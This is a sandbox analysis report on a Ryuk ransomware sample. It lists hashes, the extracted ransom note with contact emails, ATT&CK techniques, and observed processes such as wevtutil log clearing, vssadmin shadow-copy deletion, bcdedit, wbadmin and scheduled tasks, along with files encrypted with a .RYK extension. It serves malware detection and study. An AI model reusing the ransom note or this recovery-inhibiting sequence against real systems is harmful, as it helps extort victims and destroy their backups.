ryuk | 69e0e73ae659477a01cbc4a7e9720a85daa1e690718449a9f8927b76d755cf93

Analysis

max time kernel
150s
max time network
126s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
11-03-2023 01:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
Size

885KB
MD5

6a5bf25ff4f72ebca91280ffda057260
SHA1

722063331acdbfc93ccbfacbec045800a835dd9e
SHA256

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512

64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
SSDEEP

12288:Qm+PiUwyM02Jl5YqWYgeWYg955/155/0QebUlAAsrsKCQoZRn6X:Q5iUtklagQKUKRrsKCQON6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
3416	wevtutil.exe
2980	wevtutil.exe
3872	wevtutil.exe
3756	wevtutil.exe
3832	wevtutil.exe
4164	wevtutil.exe
2704	wevtutil.exe
3808	wevtutil.exe
784	wevtutil.exe
3404	wevtutil.exe
1208	wevtutil.exe
4132	wevtutil.exe
2752	wevtutil.exe
2332	wevtutil.exe
4428	wevtutil.exe
4340	wevtutil.exe
3248	wevtutil.exe
1432	wevtutil.exe
3088	wevtutil.exe
4856	wevtutil.exe
2976	wevtutil.exe
5036	wevtutil.exe
280	wevtutil.exe
5104	wevtutil.exe
4952	wevtutil.exe
2084	wevtutil.exe
4724	wevtutil.exe
3668	wevtutil.exe
1300	wevtutil.exe
3828	wevtutil.exe
2300	wevtutil.exe
4808	wevtutil.exe
4972	wevtutil.exe
4104	wevtutil.exe
1312	wevtutil.exe
4356	wevtutil.exe
3840	wevtutil.exe
4988	wevtutil.exe
4672	wevtutil.exe
1392	wevtutil.exe
856	wevtutil.exe
2904	wevtutil.exe
4632	wevtutil.exe
212	wevtutil.exe
3948	wevtutil.exe
1424	wevtutil.exe
4468	wevtutil.exe
4628	wevtutil.exe
4444	wevtutil.exe
4008	wevtutil.exe
4076	wevtutil.exe
3436	wevtutil.exe
4888	wevtutil.exe
3596	wevtutil.exe
2084	wevtutil.exe
2132	wevtutil.exe
224	wevtutil.exe
2368	wevtutil.exe
3832	wevtutil.exe
4416	wevtutil.exe
4764	wevtutil.exe
3064	wevtutil.exe
2128	wevtutil.exe
1584	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4340 bcdedit.exe
1748 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

4764 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation cmd.exe

pid	process
4340	bcdedit.exe
1748	bcdedit.exe

pid	process
4764	wbadmin.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2888 icacls.exe

pid	process
2888	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\O:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\S:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\X:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\F:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\B:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\R:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\Y:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\K:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\W:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\N:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\V:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\J:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\Z:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\U:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\A:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\P:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\M:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\Q:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\T:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\E:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\I:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\L:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

Drops file in Program Files directory 64 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-140.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforcomments.svg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\main.css.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h2x.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-io.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_MAK-ul-oob.xrm-ms.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\proofing.msi.16.en-us.tree.dat.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_MAK-ppd.xrm-ms.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_selected_18.svg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\ja-JP\MSFT_PackageManagement.strings.psd1.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADAL.DLL.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\cy.pak.DATA.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fa.pak.DATA.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sr-Cyrl-BA.pak.DATA.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_Grace-ppd.xrm-ms.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1036\MSO.ACL.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\BLENDS.ELM.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook2x.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f3\FA000000003.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Trial-ppd.xrm-ms.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp.gif.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_export_18.svg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\redact_poster.jpg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusDemoR_BypassTrial365-ul-oob.xrm-ms.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_psd.svg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_pattern_RHP.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\th.pak.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

Drops file in Windows directory 5 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exewbadmin.exe

description	ioc	process
File created	C:\Windows\RyukReadMe.txt	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File created	C:\Windows\hrmlog1	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

4548 sc.exe
2300 sc.exe
2524 sc.exe
4076 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4932 schtasks.exe
612 schtasks.exe
1300 schtasks.exe
4836 schtasks.exe

pid	process
4548	sc.exe
2300	sc.exe
2524	sc.exe
4076	sc.exe

pid	process
4932	schtasks.exe
612	schtasks.exe
1300	schtasks.exe
4836	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
2828	vssadmin.exe
2388	vssadmin.exe
3268	vssadmin.exe
3464	vssadmin.exe
2748	vssadmin.exe
2976	vssadmin.exe
1492	vssadmin.exe
1944	vssadmin.exe
2328	vssadmin.exe
3540	vssadmin.exe
2860	vssadmin.exe
4288	vssadmin.exe
224	vssadmin.exe
2244	vssadmin.exe
4304	vssadmin.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1324 taskkill.exe
4708 taskkill.exe
2460 taskkill.exe
3364 taskkill.exe
1600 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings cmd.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

4880 NOTEPAD.EXE
Runs net.exe

pid	process
1324	taskkill.exe
4708	taskkill.exe
2460	taskkill.exe
3364	taskkill.exe
1600	taskkill.exe

description	ioc	process
